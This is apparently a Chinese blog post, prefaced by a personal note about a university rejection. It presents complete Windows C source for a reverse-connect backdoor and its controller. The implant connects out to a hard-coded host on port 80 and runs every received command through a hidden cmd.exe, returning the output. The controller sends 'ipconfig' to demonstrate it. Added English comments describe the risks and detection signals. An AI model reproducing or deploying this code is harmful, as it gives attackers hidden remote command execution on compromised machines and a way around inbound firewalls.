大过年的,一早收到第一封rejection from CS U-Washington Seattle,郁闷。估计明天起还有一批rej要来,何时有offer啊!淡定淡定,要让自己变强大!恩恩!学习去!
反向后门连接,就是把后门程序植入到服务器上,由服务器主动发起对hacker的连接,由此hacker可以突破网络的访问障碍与server通信,并通过后门获取服务器信息。
实验环境:server:windows 7 professional edition + vc6.0
hacker:windows server 2003 sp2 + vc6.0
server端的后门程序:
/*
 * Reverse-connect backdoor (the "server"-side half of the demo).
 *
 * Behaviour, as written: open an outbound TCP connection to the hard-coded
 * address 192.168.111.133 on port 80, then loop forever: receive one
 * message, append it to "<system dir>//cmd.exe /c " and run it through
 * CreateProcess with a hidden window and stdout/stderr redirected into an
 * anonymous pipe, and stream whatever the pipe yields back over the socket.
 *
 * Risk notes for the reader:
 *  - No authentication and no validation of the received text: whichever
 *    peer answers on that address/port gets command execution as the user
 *    running this process.
 *  - Output is sent in plaintext, so the whole exchange is visible on the
 *    wire.
 *  - Detection hints that follow directly from this code: an unknown
 *    executable making an outbound TCP/80 connection that does not speak
 *    HTTP, and that executable spawning cmd.exe with SW_HIDE and
 *    STARTF_USESTDHANDLES (parent→cmd.exe process-creation telemetry is the
 *    usual EDR signal). Egress filtering that blocks arbitrary hosts from
 *    reaching port 80 directly would stop the connect() below.
 *
 * Code-reading notes: every "/n" inside a string literal is a literal
 * slash-n, not a newline (the output is not line-broken); "π" in the
 * CreateProcess call looks like an extraction artifact of the original
 * text — confirm against the original post.
 */
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32.lib")
int main()
{
    WSADATA WSAData;
    SOCKET sock;
    sockaddr_in addr_in;
    char buf1[1024];//receive buffer for the socket
    memset(buf1,0,1024);//cleared once here only; it is NOT re-zeroed per iteration
    //initialise Winsock
    if(WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error./n");
        return 0;
    }
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(80);//remote port (hard-coded)
    addr_in.sin_addr.S_un.S_addr = inet_addr("192.168.111.133");//remote IP (hard-coded)
    if( (sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) == INVALID_SOCKET)
    {
        printf("Socket failed. Error:%d /n",WSAGetLastError());
        return 0;
    }
    //outbound connect: this is what lets the program cross an inbound-only firewall
    if(WSAConnect(sock, (struct sockaddr*)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL) == SOCKET_ERROR)
    {
        printf("Connect failed. Error: %d/n",WSAGetLastError());
        return 0;
    }
    printf("begin to create pipe/n");
    char buffer[2048] = {0};//data read back from the pipe
    //one iteration per received command; the loop only ends via exit(0) below
    for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline)))
    {
        //attach a cmd shell to the socket
        SECURITY_ATTRIBUTES sa;//anonymous pipe used to capture cmd's output
        HANDLE hRead,hWrite;//read end (this process) / write end (child's stdout+stderr)
        sa.nLength = sizeof(SECURITY_ATTRIBUTES);
        sa.lpSecurityDescriptor = NULL;
        sa.bInheritHandle = true;//the write end must be inheritable for the child to use it
        if(!CreatePipe(&hRead,&hWrite,&sa,0))//create the pipe with the inheritable attributes
        {
            printf("Error on CreatePipe()/n");
            return 0;
        }
        printf("create pipe success/n");
        STARTUPINFO si;//redirects the child's stdout/stderr into hWrite
        PROCESS_INFORMATION pi;
        HANDLE hProcess;
        HANDLE hThread;
        DWORD dwProcessID;
        DWORD dwThreadID;
        si.cb = sizeof(STARTUPINFO);
        GetStartupInfo(&si);
        si.hStdError = hWrite;
        si.hStdOutput = hWrite;
        si.wShowWindow = SW_HIDE;//no visible console for the child
        si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
        GetSystemDirectory(cmdline, MAX_PATH + 1);//cmdline now holds the system directory
        strcat(cmdline,"//cmd.exe /c ");
        printf("cmdline = %s/n",cmdline);
        //blocking receive of the next command into buf1 (flags argument is NULL, i.e. 0)
        int len = recv(sock,buf1,1024,NULL);
        if(len == SOCKET_ERROR)//peer gone: terminate the whole process
            exit(0);
        if(len <= 1)
        {
            send(sock,"error/n",sizeof("error/n"),0);
            continue;
        }
        //NOTE(review): buf1 is never re-zeroed, so a shorter message can carry
        //trailing bytes of the previous one, and cmdline (270 bytes) is smaller
        //than the 1024 bytes buf1 can hold — no length check precedes this append.
        strncat(cmdline,buf1,strlen(buf1));//full command line: "<sysdir>//cmd.exe /c <received text>"
        printf("message get: %s/n",cmdline);
        //run the received text unchanged through cmd.exe, inheriting hWrite
        if(!CreateProcess(NULL,cmdline,NULL,NULL,true,NULL,NULL,NULL,&si,π))
        {
            send(sock,"Error command/n",sizeof("Error command/n"),0);
            continue;
        }
        CloseHandle(hWrite);//parent drops its copy so ReadFile sees EOF when the child exits
        //drain the pipe and forward each chunk to the peer until the pipe is empty
        for(DWORD byteRead;ReadFile(hRead,buffer,2048,&byteRead,NULL);memset(buffer,0,2048))
            send(sock,buffer,strlen(buffer),0);//strlen, not byteRead: output is sent up to the first NUL
    }
    return 1;
}
hacker端的操纵程序:
/*
 * Controller half of the demo (run on the "hacker" host).
 *
 * Behaviour, as written: bind a listening socket to this host's first
 * resolved address on TCP port 80, accept exactly one inbound connection,
 * send the literal string "ipconfig", do a single recv() of at most 2048
 * bytes and print it.
 *
 * Notes for the reader:
 *  - accept() performs no check on who connected; any peer that reaches
 *    port 80 is treated as the backdoor.
 *  - Only one recv() is issued, so output longer than one chunk is never
 *    read; the loop around accept() runs once and breaks.
 *  - gethostbyname() result is dereferenced without a NULL check.
 *  - From a network-monitoring standpoint the listener is indistinguishable
 *    from a web server at the port level; the distinguishing signal is the
 *    non-HTTP payload exchanged after connect.
 *  - As in the backdoor, "/n" in the string literals is a literal slash-n,
 *    not a newline.
 */
#include <winsock2.h>
#include <stdio.h>
#include <iostream>
#pragma comment(lib,"ws2_32.lib")
using namespace std;
int main()
{
    WSADATA WSAData;
    //initialise Winsock
    if(WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error./n");
        return 0;
    }
    SOCKET client;//listening socket; this side plays the role of the server
    client = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if(client == INVALID_SOCKET)
    {
        printf("Error at socket():%ld /n",WSAGetLastError());
        WSACleanup();
        return 0;
    }
    //resolve the local host's address (hostName is 128 bytes; only 100 are offered to gethostname)
    char hostName[128];
    gethostname(hostName,100);
    hostent *g_pHost;
    g_pHost=gethostbyname(hostName);//NOTE(review): not checked for NULL before use below
    ULONG HostIP = *(ULONG*)g_pHost->h_addr_list[0];
    printf("本机ip为: (%d) /n",HostIP);//prints the raw 32-bit address value, not dotted form
    //bind to the resolved address on port 80 (port must be free, e.g. IIS stopped)
    sockaddr_in backdoor;
    backdoor.sin_family = AF_INET;
    //backdoor.sin_addr.s_addr = inet_addr("127.0.0.1");
    backdoor.sin_addr = *(in_addr *)g_pHost->h_addr_list[0];
    backdoor.sin_port = htons(80);
    if(bind(client,(SOCKADDR *)&backdoor,sizeof(SOCKADDR)) == SOCKET_ERROR)
    {
        printf("bind error: %ld/n",WSAGetLastError());
        closesocket(client);
        return 0;
    }
    //listen with a backlog of 1; a failure here is only printed, not fatal
    if( listen(client,1) == SOCKET_ERROR)
        printf("error listening socket/n");
    //accept one connection; the peer's address lands in `server`
    SOCKET acceptSocket;
    sockaddr_in server;
    printf("waiting for a client to connetc.../n");
    while(1)
    {
        acceptSocket = SOCKET_ERROR;
        while(acceptSocket == SOCKET_ERROR)
            acceptSocket = accept(client,(SOCKADDR *)&server,NULL);//no peer validation
        printf("server connected/n");
        client = acceptSocket;//`client` now refers to the accepted connection (the listening handle is dropped)
        break;
    }
    printf("recv from: %s/n",inet_ntoa(server.sin_addr));
    //send one command, read one reply
    int byteSent;
    int byteRecv = SOCKET_ERROR;
    char sendbuf[32] = "ipconfig";//the only command this controller ever sends
    char recvbuf[2048] = "";
    //send
    byteSent = send(client,sendbuf,strlen(sendbuf),0);
    printf("Byte Send/n");
    //receive: a single recv() of up to 2048 bytes; anything beyond that is not read
    byteRecv = recv(client,recvbuf,2048,0);
    printf("Byte Recv: %d /n",byteRecv);
    printf("message received: %s/n",recvbuf);
    cout<<recvbuf;
    return 1;
}
验证过程:hacker端注意关闭iis,使80端口不要被占用。启动该后门控制程序。
之后server启动后门程序,在hacker端就可以得到server端ipconfig的信息了。